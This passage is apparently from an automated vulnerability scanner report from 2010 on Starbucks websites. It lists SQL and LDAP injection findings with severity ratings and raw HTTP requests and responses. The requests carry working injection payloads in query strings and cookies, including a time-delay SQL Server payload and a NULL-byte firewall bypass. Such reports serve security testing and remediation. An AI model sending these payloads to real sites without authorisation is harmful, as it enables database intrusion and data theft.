                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/iced-coffee" title="Iced">
                           <img src="http://assets.starbucks.com/assets/c0b5db9b45aa40c8802e6ef8cab1a455.jpg" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Iced</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/italian-roast" title="Italian Roast">
                           <img src="http://assets.starbucks.com/assets/68df7c127cf54ae78b4c40245fe8d7e4.png" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Extra Bold</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast">
                           <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Dec
...[SNIP]...

Request 2

GET /coffee/via/instant-coffee?113312046'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:57:02 GMT
Connection: close
Content-Length: 53065

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/coffee/via/instant-coffee/colombia" title="Colombia">
                           <img src="http://assets.starbucks.com/assets/b5deaf4ecf7d425e822f907973cb950f.png" alt="Starbucks VIA.. Colombia" />
                           <br /><strong><span>Colombia</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Medium</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/iced-coffee" title="Iced">
                           <img src="http://assets.starbucks.com/assets/c0b5db9b45aa40c8802e6ef8cab1a455.jpg" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Iced</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/italian-roast" title="Italian Roast">
                           <img src="http://assets.starbucks.com/assets/68df7c127cf54ae78b4c40245fe8d7e4.png" alt="Starbucks VIA.. Italian Roast stamp" />
                           <br /><strong><span>Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity">Extra Bold</span>
                       </a>
                   </li>
                   
                   <li class="specialty_roast">
                       <a href="/coffee/via/instant-coffee/decaf-italian-roast" title="Decaf Italian Roast">
                           <img src="http://assets.starbucks.com/assets/fe84dd520a6145e0a7a83ab844737097.png" alt="Information about Starbucks VIA.. Decaf Italian Roast" />
                           <br /><strong><span>Decaf Italian Roast</span></strong>
                           <br /><span class="family">Starbucks VIA.. Coffees</span>
                           <br /><span class="intensity"></span>
                       </a>
                   </li>
                   
               </ol>
       </div>
       

       <div class="section" id="posts">


<div id="blog-602" class="blog-entry">
<h2><a href="/blog/Perfect-your-Starbucks-VIA-Ready-Brew-Flavored-experience">Perfect Your Starbucks VI
...[SNIP]...

1.3. http://www.starbucks.com/menu [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /menu?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:03 GMT
Connection: close
Content-Length: 72340

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/menu/drinks/chocolate/peppermint-mocha-hot-chocolate">Peppermint Mocha Hot Chocolate</a></li><li><a href="/menu/drinks/chocolate/salted-caramel-hot-chocolate">Salted Caramel Hot Chocolate</a></li><li><a href="/menu/drinks/chocolate/white-hot-chocolate">White Hot Chocolate</a></li></ol></li><li><a href="/menu/drinks/espresso">Espresso Beverages</a><ol><li><a href="/menu/drinks/espresso/caffe-americano">Caff&#232; Americano</a></li><li><a href="/menu/drinks/espresso/caffe-latte">Caff&#232; Latte</a></li><li><a href="/menu/drinks/espresso/caffe-mocha">Caff&#232; Mocha</a></li><li><a href="/menu/drinks/espresso/cappuccino">Cappuccino</a></li><li><a href="/menu/drinks/espresso/caramel-macchiato">Caramel Macchiato</a></li><li><a href="/menu/drinks/espresso/caramel-brulee-latte">Caremel Brul&#233;e Latte</a></li><li><a href="/menu/drinks/espresso/cinnamon-dolce-latte">Cinnamon Dolce Latte</a></li><li><a href="/menu/drinks/espresso/eggnog-latte">Eggnog Latte</a></li><li><a href="/menu/drinks/espresso/espresso-shot">Espresso</a></li><li><a href="/menu/drinks/espresso/espresso-con-panna">Espresso Con Panna</a></li><li><a href="/menu/drinks/espresso/espresso-macchiato">Espresso Macchiato </a></li><li><a href="/menu/drinks/espresso/flavored-latte">Flavored Latte</a></li><li><a href="/menu/drinks/espresso/gingerbread-latte">Gingerbread Latte</a></li><li><a href="/menu/drinks/espresso/iced-caffe-americano">Iced Caff&#232; Americano</a></li><li><a href="/menu/drinks/espresso/iced-caffe-latte">Iced Caff&#232; Latte</a></li><li><a href="/menu/drinks/espresso/iced-caffe-mocha">Iced Caff&#232; Mocha</a></li><li><a href="/menu/drinks/espresso/iced-caramel-macchiato">Iced Caramel Macchiato</a></li><li><a href="/menu/drinks/espresso/iced-cinnamon-dolce-latte">Iced Cinnamon Dolce Latte</a></li><li><a href="/menu/drinks/espresso/iced-flavored-latte">Iced Flavored Latte</a></li><li><a href="/menu/drinks/espresso/iced-gingerbread-latte">Iced Gingerbread Latte</a></li><li><a href="/men
...[SNIP]...

Request 2

GET /menu?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:04 GMT
Connection: close
Content-Length: 72143

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<a href="/menu/drinks/chocolate/salted-caramel-hot-chocolate">Salted Caramel Hot Chocolate</a></li><li><a href="/menu/drinks/chocolate/white-hot-chocolate">White Hot Chocolate</a></li></ol></li><li><a href="/menu/drinks/espresso">Espresso Beverages</a><ol><li><a href="/menu/drinks/espresso/caffe-americano">Caff&#232; Americano</a></li><li><a href="/menu/drinks/espresso/caffe-latte">Caff&#232; Latte</a></li><li><a href="/menu/drinks/espresso/caffe-mocha">Caff&#232; Mocha</a></li><li><a href="/menu/drinks/espresso/cappuccino">Cappuccino</a></li><li><a href="/menu/drinks/espresso/caramel-macchiato">Caramel Macchiato</a></li><li><a href="/menu/drinks/espresso/caramel-brulee-latte">Caremel Brul&#233;e Latte</a></li><li><a href="/menu/drinks/espresso/cinnamon-dolce-latte">Cinnamon Dolce Latte</a></li><li><a href="/menu/drinks/espresso/eggnog-latte">Eggnog Latte</a></li><li><a href="/menu/drinks/espresso/espresso-shot">Espresso</a></li><li><a href="/menu/drinks/espresso/espresso-con-panna">Espresso Con Panna</a></li><li><a href="/menu/drinks/espresso/espresso-macchiato">Espresso Macchiato </a></li><li><a href="/menu/drinks/espresso/flavored-latte">Flavored Latte</a></li><li><a href="/menu/drinks/espresso/gingerbread-latte">Gingerbread Latte</a></li><li><a href="/menu/drinks/espresso/iced-caffe-americano">Iced Caff&#232; Americano</a></li><li><a href="/menu/drinks/espresso/iced-caffe-latte">Iced Caff&#232; Latte</a></li><li><a href="/menu/drinks/espresso/iced-caffe-mocha">Iced Caff&#232; Mocha</a></li><li><a href="/menu/drinks/espresso/iced-caramel-macchiato">Iced Caramel Macchiato</a></li><li><a href="/menu/drinks/espresso/iced-cinnamon-dolce-latte">Iced Cinnamon Dolce Latte</a></li><li><a href="/menu/drinks/espresso/iced-flavored-latte">Iced Flavored Latte</a></li><li><a href="/menu/drinks/espresso/iced-peppermint-mocha">Iced Peppermint Mocha</a></li><li><a href="/menu/drinks/espresso/iced-peppermint-white-chocolate-mocha">Iced Peppermint White Chocolate Mocha</a></li><li><a
...[SNIP]...

1.4. http://www.starbucks.com/responsibility [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /responsibility

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883%00'; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 1

HTTP/1.1 302 Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Location: /error/
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:14:43 GMT
Connection: close
Content-Length: 128

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ferror%2f">here</a>.</h2>
</body></html>

Request 2

GET /responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883%00''; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:15:59 GMT
Connection: close
Content-Length: 56642

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...

1.5. http://www.starbucks.com/responsibility/community/starbucks-foundation [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/community/starbucks-foundation

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the __utmc cookie. The application took 51339 milliseconds to respond to the request, compared with 260 milliseconds for the original request, indicating that the injected SQL command caused a time delay.

The database appears to be Microsoft SQL Server.

Request

GET /responsibility/community/starbucks-foundation HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883')waitfor%20delay'0%3a0%3a20'--; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:42:07 GMT
Connection: close
Content-Length: 39480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...

1.6. http://www.starbucksstore.com/aff/adredir.asp [SITESERVER cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /aff/adredir.asp

Issue detail

The SITESERVER cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SITESERVER cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C'; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:25 GMT
Connection: close
Content-Length: 75

The page cannot be displayed because an internal server error has occurred.

Request 2

GET /aff/adredir.asp?CCAID=SBPTPAHP1SHCO&Redir=%2Fcoffee%2F HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C''; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 2

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 168
Content-Type: text/html
Location: /coffee/?CCAID=SBPTPAHP1SHCO&Redir=/coffee/
Server: Microsoft-IIS/7.0
Set-Cookie: CookingAd=CCREF=&CCADATE=20101116&CCAID=SBPTPAHP1SHCO; expires=Thu, 16-Dec-2010 08:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:30:26 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/coffee/?CCAID=SBPTPAHP1SHCO&amp;Redir=/coffee/">here</a>.</body>

1.7. http://www.starbucksstore.com/guestassist/shcontus.asp [ASPSESSIONIDACABBACA cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /guestassist/shcontus.asp

Issue detail

The ASPSESSIONIDACABBACA cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /guestassist/shcontus.asp?error=noselection HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK'%20and%201%3d1--%20; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK; ASPSESSIONIDCABCBCAB=JKFLDLCBMLMOMLJLKGKMLOEI

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20694
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSCDCCADA=IIKAELCBBBIFLHKHKJDODFIM; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:32:01 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Starbucks Store">
       <meta name="keywords" content="starbucks, coffee">
       
       <script src="/include/LibJavaScript.js" type="text/javascript"></script>



<title>Contact Us - StarbucksStore.com</title>
<script language="JavaScript1.2" type="text/javascript"><!--    
   function CheckInput(form)
   {
       var passed = true;
       if (form.cboSubjects){
           if (form.cboSubjects.selectedIndex==0){
               alert("Please select a subject and topic for your email.");
               passed = false;
           }
       }
       return passed;
   }
           
   //-->
</script>        

<script LANGUAGE="JavaScript" SRC="guestassist_jscript.js"></script>


</head>    
<body onload="Page_OnLoad()">
<div id="omniture">

<!-- SiteCatalyst code version: G.6.Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */
   var s_pageName="/guestassist/shcontus.asp"
   var s_setRef=""
   var s_server="10.11.5.101"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shcontus.asp"
   var s_prop3="SBPTPAHP1SHTB"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shcontus.asp?error=noselection"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
   var s_zip=""
   var s_events=""
   var s_products=""
   var s_purchaseID=""
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar3=""
   var s_eVar4=""
   var s_eVar5=""
   var s_eVar6=""
   var s_eVar7=""
   var s_eVar8=""
   var s_eVar9=""
   var s_eVar10=""
   
   var strURL = new String(
...[SNIP]...

Request 2

GET /guestassist/shcontus.asp?error=noselection HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucksstore.com/guestassist/shcontus.asp?error=noselection
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucksstore.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB; CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; ASPSESSIONIDACABBACA=OKBMDLCBGJFNOPGDEIPJMFNK'%20and%201%3d2--%20; ASPSESSIONIDACACCDBA=LNFLDLCBOHDNPNFKEGCPKHPK; ASPSESSIONIDCABCBCAB=JKFLDLCBMLMOMLJLKGKMLOEI

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20694
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSAADCCCB=NIJAELCBNKJDJPDBHKGHDDEA; path=/
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 20:32:02 GMT

<!--S1--><!--S0-->

<html>
   <head>    
       <LINK REL="StyleSheet" HREF="/include/sitenew.css" TYPE="text/css">
       <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
       <meta name="description" content="Starbucks Store">
       <meta name="keywords" content="starbucks, coffee">
       
       <script src="/include/LibJavaScript.js" type="text/javascript"></script>



<title>Contact Us - StarbucksStore.com</title>
<script language="JavaScript1.2" type="text/javascript"><!--    
   function CheckInput(form)
   {
       var passed = true;
       if (form.cboSubjects){
           if (form.cboSubjects.selectedIndex==0){
               alert("Please select a subject and topic for your email.");
               passed = false;
           }
       }
       return passed;
   }
           
   //-->
</script>        

<script LANGUAGE="JavaScript" SRC="guestassist_jscript.js"></script>


</head>    
<body onload="Page_OnLoad()">
<div id="omniture">

<!-- SiteCatalyst code version: G.6.Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com --><script language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */
   var s_pageName="/guestassist/shcontus.asp"
   var s_setRef=""
   var s_server="10.11.5.101"
   var s_channel=""
   var s_pageType=""
   var s_prop1=""
   var s_prop2="/guestassist/shcontus.asp"
   var s_prop3="SBPTPAHP1SHTB"
   var s_prop4=""
   var s_prop5=""
   var s_prop6="/guestassist/shcontus.asp?error=noselection"
   var s_prop7=""
   var s_prop8=""
   var s_prop9=""
   var s_prop10=""
   /* E-commerce Variables */
   var s_campaign=""
   var s_state=""
   var s_zip=""
   var s_events=""
   var s_products=""
   var s_purchaseID=""
   var s_eVar1=""
   var s_eVar2=""
   var s_eVar3=""
   var s_eVar4=""
   var s_eVar5=""
   var s_eVar6=""
   var s_eVar7=""
   var s_eVar8=""
   var s_eVar9=""
   var s_eVar10=""
   
   var strURL = new String(
...[SNIP]...

2. LDAP injection  previous  next
There are 4 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


2.1. http://www.starbucksstore.com/ [ASPSESSIONIDACABBACA cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucksstore.com
Path:   /

Issue detail

The ASPSESSIONIDACABBACA cookie appears to be vulnerable to LDAP injection attacks.

The payloads b04135e4d2d6b331)(sn=* and b04135e4d2d6b331)!(sn=* were each submitted in the ASPSESSIONIDACABBACA cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET / HTTP/1.1
Host: www.starbucksstore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CCVC=Version=1%2E0&ID=1; CCREFID=Version=1%2E0&ID=http%3A%2F%2Fwww%2Estarbucks%2Ecom%2Fcoffee%2Fvia%2Fflavored%2Dcoffee; SITESERVER=Version=1%2E0&ID=29BB94B7790042E690D3142F9FDF2C8C; ASPSESSIONIDACABBACA=b04135e4d2d6b331)(sn=*; ASPSESSIONIDCCDDADAA=GOPJDLCBKEOEKEKNCNEFKIHA; CookingAd=CCADATE=20101116&CCAID=SBPTPAHP1SHTB;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 21174
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:36:30 GMT
Connection: close

<!--S1--><!--S0-->        
   <link href="/include/sitenew.css" type="text/css" rel="StyleSheet">
   <meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=ISO-8859-1">
   <meta name="description" content="Find every Starbucks Coffee at the Official Online Store.">
   <meta name="keywords" content="Coffee, Starbucks Coffee, whole bean coffee, ground coffee, decaffeinated coffee, instant coffee, VIA,Tazo tea">
   

   <script src="/include/LibJavaScript.js" type="text/javascript"></script>
<title>
Starbucks Coffee - Coffee Beans, Espresso Pods, VIA, and House Blend at Starbucks Store
</title>

</head>    
<body id="home">
<div id="omniture">

</div>
   <div id="container">
       <div id="header">
<h1><a id="logo" href="http://www.starbucksstore.com/">Starbucks Store</a></h1>
<ul id="utilities">
<li><a href="http://www.starbucks.com" target="_blank">Starbucks Home</a>.</li>
<li><a href="http://www.starbucks.com/retail/find/default.aspx" target="_blank">Our Stores</a>.</li>
<li><a href="http://www.starbucks.com/aboutus/" target="_blank">About Us</a></li>
</ul>
<div id="locator">
<div class="accountlinks"><a href="http://www.starbucksstore.com/mya/links.asp">My Account</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/shopping">Cart</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/mya/track.asp">Order Status</a>&nbsp;&nbsp;.&nbsp;&nbsp;<a href="http://www.starbucksstore.com/guestassist/shcontus.asp">Help</a></div>
<h2><label for="txtLocation"><b>Search the Starbucks Store</b></label></h2>
<form method="get" action="http://www.starbucksstore.com/products/include/SearchNav.asp" name="searchform">
<input type="hidden" name="search" value="Products">
